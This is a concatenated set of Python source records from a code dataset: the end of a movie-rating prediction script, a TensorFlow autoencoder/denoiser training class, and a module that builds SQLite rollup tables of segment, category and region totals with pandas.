np.linalg.norm(user_vector)))\n except:\n loga(\"Unexpected error:\", sys.exc_info()[0])\n loga(\"{0:f} {1} {2}\".format(rotation, old_user_vector, user_vector))\n\n old_user_vector = user_vector\n \n loga(\"User vector: {} ({}) [{}]\".format(user_vector.T, user_vector.shape, np.linalg.norm(user_vector)))\n #loga(\"DEBUG: shapes: {}, {}\".format(np.matmul(seen_memb, user_vector).shape, seen_movie_bias.shape))\n #loga(\"DEBUG: {}, {}\".format(np.matmul(seen_memb, user_vector), seen_movie_bias))\n seen_predicted_score = np.add(np.matmul(seen_memb, user_vector), seen_movie_bias)\n seen_predicted_score = np.minimum(np.maximum(0.5, seen_predicted_score + seen_user_bias), 5.0)\n loga(\" user bias: {}\".format(seen_user_bias))\n #loga(\" predicted score: {}\".format(predicted_score))\n #loga(\" actual scores: {}\".format(seen_actual_score))\n loga(\" fixed: context: {0} mse: {2:.3f}\".format(i, (np.sum(seen_predicted_score) - np.sum(seen_actual_score))/i, np.sum(np.square(seen_predicted_score - seen_actual_score))/i))\n \n validation_memb = memb.loc[validation_movieIds,].values\n validation_movie_bias = mbias.loc[validation_movieIds].values\n validation_predicted_score = np.minimum(5.0,np.maximum(0.5,np.add(np.add(np.matmul(validation_memb, user_vector), validation_movie_bias), seen_user_bias)))\n validation_actual_score = np.matrix(user_ratings[i:]['rating']).T\n loga(\" predicted: {} {}[t]\".format(validation_predicted_score.shape, np.transpose(validation_predicted_score)))\n loga(\" actual: {} {}[t]\".format(validation_actual_score.shape, validation_actual_score.T))\n validation_error = validation_actual_score - validation_predicted_score\n loga(\" error: {} {}\".format(validation_error.shape, validation_error.T))\n num_movies = validation_movieIds.shape[0]\n loga(\" context: {0} num elements: {1} avg error: {2:.3f} mse: {3:.3f}\".format(i, num_movies, \n 
(np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies))\n print(\"{0},{1},{2:.3f},{3:.3f}\".format(i, num_movies, \n (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies), file=outf)\n loga(\"---\")\n \n\n", "sub_path": "t9c.py", "file_name": "t9c.py", "file_ext": "py", "file_size_in_byte": 7456, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 60, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 63, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 135, "usage_type": "attribute"}, {"api_name": "math.acos", "line_number": 138, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 138, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 140, "usage_type": 
"call"}, {"api_name": "numpy.linalg.norm", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 145, "usage_type": "attribute"}, {"api_name": "numpy.add", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 169, "usage_type": "call"}]}
+{"seq_id": "358276651", "text": "from base.base_train_multi import BaseTrainMulti\nfrom tqdm import tqdm\nimport numpy as np\nfrom time import sleep\nfrom time import time\nfrom utils.evaluations import save_results\n\n\nclass AutoencoderDenoiserTrainer(BaseTrainMulti):\n\n\n def __init__(self, sess, model, data, config, logger):\n super(AutoencoderDenoiserTrainer, self).__init__(sess, model, data, config, logger)\n self.batch_size = self.config.data_loader.batch_size\n self.noise_dim = self.config.trainer.noise_dim\n self.img_dims = self.config.trainer.image_dims\n # Inititalize the train Dataset Iterator\n self.sess.run(self.data.iterator.initializer)\n # Initialize the test Dataset Iterator\n self.sess.run(self.data.test_iterator.initializer)\n if self.config.data_loader.validation:\n self.sess.run(self.data.valid_iterator.initializer)\n self.best_valid_loss = 0\n self.nb_without_improvements = 0\n\n def train_epoch_ae(self):\n # Attach the epoch loop to a variable\n begin = time()\n # Make the loop of the epoch iterations\n loop = tqdm(range(self.config.data_loader.num_iter_per_epoch))\n ae_losses = []\n summaries = []\n image = self.data.image\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in loop:\n loop.set_description(\"Epoch:{}\".format(cur_epoch + 1))\n loop.refresh() # to show immediately the update\n sleep(0.01)\n ae, sum_ae = self.train_step_ae(image, cur_epoch)\n ae_losses.append(ae)\n summaries.append(sum_ae)\n self.logger.info(\"Epoch {} terminated\".format(cur_epoch))\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries)\n # Check for reconstruction\n if cur_epoch % self.config.log.frequency_test == 0:\n image_eval = self.sess.run(image)\n feed_dict = {self.model.image_input: image_eval, self.model.is_training_ae: False}\n reconstruction = self.sess.run(self.model.summary_op_ae, feed_dict=feed_dict)\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=[reconstruction])\n ae_m = np.mean(ae_losses)\n self.logger.info(\n \"Epoch: {} | time = {} s | loss AE= {:4f} \".format(\n cur_epoch, time() - begin, ae_m\n )\n )\n self.model.save(self.sess)\n\n def train_epoch_den(self):\n # Attach the epoch loop to a variable\n begin = time()\n # Make the loop of the epoch iterations\n loop = tqdm(range(self.config.data_loader.num_iter_per_epoch))\n den_losses = []\n summaries = []\n image = self.data.image\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in loop:\n loop.set_description(\"Epoch:{}\".format(cur_epoch + 1))\n loop.refresh() # to show immediately the update\n sleep(0.01)\n den, sum_den = self.train_step_den(image, cur_epoch)\n den_losses.append(den)\n summaries.append(sum_den)\n self.logger.info(\"Epoch {} terminated\".format(cur_epoch))\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries, summarizer=\"train_den\")\n # Check for reconstruction\n if cur_epoch % self.config.log.frequency_test == 0:\n image_eval = self.sess.run(image)\n noise = np.zeros_like(image_eval)\n feed_dict = {self.model.image_input: image_eval,self.model.noise_tensor: noise, self.model.is_training_ae: False}\n reconstruction = self.sess.run(self.model.summary_op_den, feed_dict=feed_dict)\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=[reconstruction], summarizer=\"train_den\")\n den_m = np.mean(den_losses)\n self.logger.info(\n \"Epoch: {} | time = {} s | loss DEN= {:4f} \".format(\n cur_epoch, time() - begin, den_m\n )\n )\n self.model.save(self.sess)\n\n def train_step_ae(self, image, cur_epoch):\n image_eval 
= self.sess.run(image)\n feed_dict = {\n self.model.image_input: image_eval,\n self.model.is_training_ae: True,\n }\n # Train Autoencoder\n _, lae, sm_ae = self.sess.run(\n [self.model.train_auto_op, self.model.auto_loss, self.model.summary_op_loss_ae],\n feed_dict=feed_dict,\n )\n return lae, sm_ae\n\n\n def train_step_den(self, image, cur_epoch):\n noise = np.random.normal(\n loc=0.0,\n scale=1.0,\n size=[self.config.data_loader.batch_size] + self.config.trainer.image_dims,\n )\n image_eval = self.sess.run(image)\n feed_dict = {\n self.model.image_input: image_eval,\n self.model.noise_tensor: noise,\n self.model.is_training_ae: False,\n }\n # Train Denoiser\n _, lden, sm_den = self.sess.run(\n [self.model.train_den_op, self.model.den_loss, self.model.summary_op_loss_den],\n feed_dict=feed_dict,\n )\n return lden, sm_den\n\n def test_epoch(self):\n self.logger.warn(\"Testing evaluation...\")\n scores_rec = []\n scores_den = []\n scores_pipe = []\n scores_pipe_2 = []\n scores_mask1 = []\n scores_mask2 = []\n scores_mask1_s = []\n scores_mask2_s = []\n summaries = []\n inference_time = []\n true_labels = []\n # Create the scores\n test_loop = tqdm(range(self.config.data_loader.num_iter_per_test))\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in test_loop:\n test_batch_begin = time()\n test_batch, test_labels, ground_truth = self.sess.run([self.data.test_image, self.data.test_label, self.data.ground_truth])\n test_loop.refresh() # to show immediately the update\n sleep(0.01)\n feed_dict = {self.model.image_input: test_batch, self.model.ground_truth: ground_truth, self.model.is_training_ae: False}\n scores_rec += self.sess.run(self.model.rec_score, feed_dict=feed_dict).tolist()\n scores_den += self.sess.run(self.model.den_score, feed_dict=feed_dict).tolist()\n scores_pipe += self.sess.run(self.model.pipe_score, feed_dict=feed_dict).tolist()\n scores_pipe_2 += self.sess.run(self.model.pipe_score_2, feed_dict=feed_dict).tolist()\n scores_mask1 += self.sess.run(self.model.mask_score_1, feed_dict=feed_dict).tolist()\n scores_mask2 += self.sess.run(self.model.mask_score_2, feed_dict=feed_dict).tolist()\n scores_mask1_s += self.sess.run(self.model.mask_score_1_s, feed_dict=feed_dict).tolist()\n scores_mask2_s += self.sess.run(self.model.mask_score_2_s, feed_dict=feed_dict).tolist()\n summaries +=self.sess.run([self.model.summary_op_test],feed_dict=feed_dict)\n inference_time.append(time() - test_batch_begin)\n true_labels += test_labels.tolist()\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries,summarizer=\"test\")\n true_labels = np.asarray(true_labels)\n inference_time = np.mean(inference_time)\n self.logger.info(\"Testing: Mean inference time is {:4f}\".format(inference_time))\n scores_rec = np.asarray(scores_rec)\n scores_den = np.asarray(scores_den)\n scores_pipe = np.asarray(scores_pipe)\n scores_pipe_2 = np.asarray(scores_pipe_2)\n scores_mask1 = np.asarray(scores_mask1)\n scores_mask2 = np.asarray(scores_mask2)\n scores_mask1_s = np.asarray(scores_mask1_s)\n scores_mask2_s = np.asarray(scores_mask2_s)\n # scores_scaled = (scores - min(scores)) / (max(scores) - min(scores))\n step = self.sess.run(self.model.global_step_tensor)\n percentiles = np.asarray(self.config.trainer.percentiles)\n save_results(\n self.config.log.result_dir,\n scores_rec,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_rec\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n 
percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_den,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_den\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_pipe,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_pipe_1\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_pipe_2,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_pipe_2\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask1,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_1\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask2,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_2\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask1_s,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_1_s\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask2_s,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_2_s\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n\n\n", "sub_path": "trainers/autoencoder_denoiser_trainer.py", "file_name": "autoencoder_denoiser_trainer.py", "file_ext": "py", "file_size_in_byte": 11288, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "base.base_train_multi.BaseTrainMulti", "line_number": 9, "usage_type": "name"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 50, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 62, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 83, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 106, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 138, "usage_type": "call"}, {"api_name": "time.time", "line_number": 141, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 144, 
"usage_type": "call"}, {"api_name": "time.time", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 186, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 200, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 214, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 228, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 242, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 256, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 270, "usage_type": "call"}]}
+{"seq_id": "604964105", "text": "'''\nCreated on Dec 18, 2018\n\n@author: vahidrogo\n'''\n\nimport pandas as pd\nimport sqlite3 as sql\nimport threading\nfrom tkinter import messagebox as msg\n\nimport constants\nfrom progress import Progress\nimport utilities\n\n\nclass RollupTotals(threading.Thread):\n '''\n Parent class for SegmentTotals(), SegmentTotalsRegion(), \n CategoryTotals() and CategoryTotalsRegion().\n \n Creates a new table with the data fetched using the query \n set in each of the child classes.\n '''\n \n \n FIRST_QUARTER_COLUMN = 3\n \n\n def __init__(\n self, is_addon=False, is_category=True, is_region=False,\n is_business_code_totals=False\n ):\n super().__init__()\n \n self.is_addon = is_addon\n self.is_category = is_category\n self.is_region = is_region\n self.is_business_code_totals = is_business_code_totals\n \n self.title = constants.APP_NAME\n \n self.input_table_name = constants.BUSINESS_CODE_TOTALS_TABLE\n \n if self.is_addon:\n self.input_table_name += constants.ADDON_SUFFIX\n \n self.df = None\n \n self.query = ''\n self.rollup_id_name = ''\n self.rollup_table_name = ''\n \n \n def run(self):\n if self.is_addon:\n self.rollup_table_name += constants.ADDON_SUFFIX\n \n self.progress = Progress(self, self.title, abort=False)\n \n self.progress.update_progress(0, 'Fetching business code totals.')\n \n self._set_df()\n \n progress = 90 if self.is_region else 70\n \n self.progress.update_progress(progress, 'Preparing data.')\n \n if self.df is not None:\n # drops the old id column\n self.df.drop(constants.ID_COLUMN_NAME, axis=1, inplace=True)\n \n if not self.is_business_code_totals:\n # drops the business code id column\n self.df.drop(\n constants.BUSINESS_CODE_ID_COLUMN_NAME, axis=1, inplace=True\n )\n \n self._update_column_names()\n \n self._set_region_id_column()\n \n column_names = list(self.df)\n \n juri_column = (\n constants.REGION_ID_COLUMN_NAME if self.is_region \n else constants.TAC_COLUMN_NAME\n )\n \n # sets the columns that will be used in the table in the order \n # that they will be in\n new_column_names = [\n constants.ID_COLUMN_NAME, juri_column, self.rollup_id_name\n ] + column_names[self.FIRST_QUARTER_COLUMN:]\n \n self.df = self.df[new_column_names]\n \n self._group_by_new_id()\n \n progress = 95 if self.is_region else 85\n \n self.progress.update_progress(progress, 'Creating table.')\n \n self._create_table()\n \n self.progress.update_progress(100, 'Build complete.')\n \n self.progress.destroy()\n \n \n def _set_df(self):\n sql_code = 'ATTACH DATABASE ? 
AS ?'\n        \n        args = (str(constants.DB_PATHS[constants.STARS_DB]), constants.STARS_DB)\n        \n        con = sql.connect(\n            constants.DB_PATHS[constants.STATEWIDE_DATASETS_DB], uri=True,\n            timeout=constants.DB_TIMEOUT\n        )\n        \n        db_attached = utilities.execute_sql(\n            sql_code=sql_code, args=args, open_con=con, dontfetch=True\n        )\n        \n        if db_attached:\n            results = utilities.execute_sql(\n                sql_code=self.query, open_con=con, getcursor=True\n            )\n            \n            if results:\n                column_names = [i[0] for i in results.description]\n                \n                data = results.fetchall()\n                \n                self.df = pd.DataFrame(data, columns=column_names)\n            \n        con.close()\n        \n        \n    def _update_column_names(self):\n        column_names = list(self.df)\n        \n        # changes column to \"id\" from \"new_id\"\n        column_names[0] = constants.ID_COLUMN_NAME\n        \n        if self.is_region:\n            tac_index = 1 if self.is_business_code_totals else 2\n            \n            # changes column to \"region_id\" from \"tac\"\n            column_names[tac_index] = constants.REGION_ID_COLUMN_NAME\n        \n        # updates the column names in the dataframe\n        self.df.columns = column_names\n        \n        \n    def _set_region_id_column(self):\n        # gets the region ids from the id column\n        region_id_column = self.df[\n            constants.ID_COLUMN_NAME\n        ].apply(lambda x: x.split('-')[0])\n        \n        self.df[constants.REGION_ID_COLUMN_NAME] = region_id_column\n        \n\n    def _group_by_new_id(self):\n        column_names = list(self.df)\n        \n        group_columns = column_names[:self.FIRST_QUARTER_COLUMN]\n        \n        sum_columns = column_names[self.FIRST_QUARTER_COLUMN:]\n        \n        self.df = self.df.groupby(\n            group_columns, as_index=False, sort=False\n        )[sum_columns].sum()\n        \n        \n    def _create_table(self):\n        con = sql.connect(\n            constants.DB_PATHS[constants.STATEWIDE_DATASETS_DB], \n            timeout=constants.DB_TIMEOUT\n        )\n        \n        try:\n            with con:\n                self.df.to_sql(\n                    self.rollup_table_name, con, if_exists='replace', \n                    index=False\n                )\n            \n        except sql.OperationalError as e:\n            msg.showerror(self.title, e)\n        \n        con.close()\n        \n        \nclass SegmentTotals(RollupTotals):\n    '''\n    Creates the \"segment_totals\" table in the \"statewide_datasets\"\n    database. The table contains the amounts from the \n    \"business_code_totals\" table also in \"statewide_datasets\" rolled\n    up by \"segment_id\". The \"segment_id\" comes from the \"segments\" \n    table in \"starsdb\" based on the \"business_code_id\" from the \n    \"business_code_totals\" table.\n    '''\n    \n\n    def __init__(self, is_addon=False):\n        super().__init__(is_addon)\n        \n        self.title += ' - Segment Totals'\n        \n        self.query = f'''\n            SELECT d.{constants.TAC_COLUMN_NAME} || '-' || \n            s.{constants.ID_COLUMN_NAME} new_id, \n            s.{constants.ID_COLUMN_NAME} {constants.SEGMENT_ID_COLUMN_NAME}, \n            d.* \n            \n            FROM {self.input_table_name} d, \n            {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n            {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s\n            \n            WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n            =b.{constants.ID_COLUMN_NAME} \n            AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n            =s.{constants.ID_COLUMN_NAME} \n            '''\n        \n        self.rollup_id_name = constants.SEGMENT_ID_COLUMN_NAME\n        \n        self.rollup_table_name = 'segment_totals'\n        \n        self.start()\n        \n        \nclass SegmentTotalsRegion(RollupTotals):\n    '''\n    Creates the \"segment_totals_region\" table in the \"statewide_datasets\"\n    database. The table contains the amounts from the \n    \"business_code_totals\" table also in \"statewide_datasets\" rolled up by\n    \"segment_id\" and \"region_id\". The \"segment_id\" comes from the \n    \"segments\" table in \"starsdb\" based on the \"business_code_id\" from the \n    \"business_code_totals\" table. 
The \"region_id\" comes from the \n \"jurisdictions\" table also in \"starsdb\".\n '''\n \n\n def __init__(self):\n super().__init__(is_region=True)\n \n self.title += ' - Segment Totals Region'\n \n self.query = f'''\n SELECT c.region_id || '-' || \n s.{constants.ID_COLUMN_NAME} new_id, \n s.{constants.ID_COLUMN_NAME} {constants.SEGMENT_ID_COLUMN_NAME}, \n d.*\n \n FROM {self.input_table_name} as d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} c,\n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s,\n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME}\n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME}\n AND d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.SEGMENT_ID_COLUMN_NAME\n \n self.rollup_table_name = 'segment_totals_region'\n \n self.start()\n \n \nclass CategoryTotals(RollupTotals):\n '''\n Creates the \"category_totals\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled up by\n \"category_id\". The \"category_id\" comes from the \"segments\" table in \n \"starsdb\" based on the \"segment_id\" that comes from the \"business_codes\" \n table also in \"starsdb\". The \"segment_id\" is based on the \n \"business_code_id\" in the \"business_code_totals\" table.\n '''\n \n \n def __init__(self, is_addon=False):\n super().__init__(is_addon, is_category=True)\n \n self.title += ' - Category Totals'\n \n self.query = f'''\n SELECT d.{constants.TAC_COLUMN_NAME} || '-' || \n c.{constants.ID_COLUMN_NAME} as new_id, \n c.{constants.ID_COLUMN_NAME} as \n {constants.CATEGORY_ID_COLUMN_NAME}, d.* \n \n FROM {self.input_table_name} as d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} as b, \n {constants.STARS_DB}.{constants.CATEGORIES_TABLE} as c, \n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} as s \n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME}\n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME} \n AND s.{constants.CATEGORY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.CATEGORY_ID_COLUMN_NAME\n \n self.rollup_table_name = 'category_totals'\n \n self.start()\n \n \nclass CategoryTotalsRegion(RollupTotals):\n '''\n Creates the \"category_totals_region\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled up \n by \"category_id\" and \"region_id\". The \"category_id\" comes from the \n \"segments\" table in \"starsdb\" based on the \"segment_id\" that comes \n from the \"business_codes\" table also in \"starsdb\". The \"segment_id\" \n is based on the \"business_code_id\" in the \"business_code_totals\" \n table. The \"region_id\" comes from the \"jurisdictions\" table in \n \"starsdb\". 
\n '''\n \n \n def __init__(self):\n super().__init__(is_region=True)\n \n self.title += ' - Category Totals Region'\n \n self.query = f'''\n SELECT co.region_id || '-' || \n c.{constants.ID_COLUMN_NAME} new_id, \n c.{constants.ID_COLUMN_NAME} {constants.CATEGORY_ID_COLUMN_NAME}, \n d.* \n \n FROM {self.input_table_name} d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} co,\n {constants.STARS_DB}.{constants.CATEGORIES_TABLE} c, \n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s, \n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME} \n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME} \n AND s.{constants.CATEGORY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n AND d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =co.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.CATEGORY_ID_COLUMN_NAME\n \n self.rollup_table_name = 'category_totals_region'\n \n self.start()\n \n \nclass BusinessCodeTotalsRegion(RollupTotals):\n '''\n Creates the \"business_code_totals_region\" table in the \n \"statewide_datasets\" database. The table contains the amounts from \n the \"business_code_totals\" table also in the \"statewide_datasets\" \n rolled up by \"region_id\". The \"region_id\" comes form the \n \"jurisdictions\" table in \"starsdb\".\n '''\n \n \n def __init__(self):\n super().__init__(is_region=True, is_business_code_totals=True)\n \n self.title += ' - Business Code Totals Region'\n \n self.query = f'''\n SELECT co.region_id || '-' || \n d.{constants.BUSINESS_CODE_ID_COLUMN_NAME} new_id, \n d.* \n \n FROM {self.input_table_name} d, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} co,\n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =co.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.BUSINESS_CODE_ID_COLUMN_NAME\n \n self.rollup_table_name = 'business_code_totals_region'\n \n self.start()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n", "sub_path": "rolluptotals.py", "file_name": "rolluptotals.py", "file_ext": "py", "file_size_in_byte": 15103, "program_lang": "python", "lang": "en", "doc_type": "code", 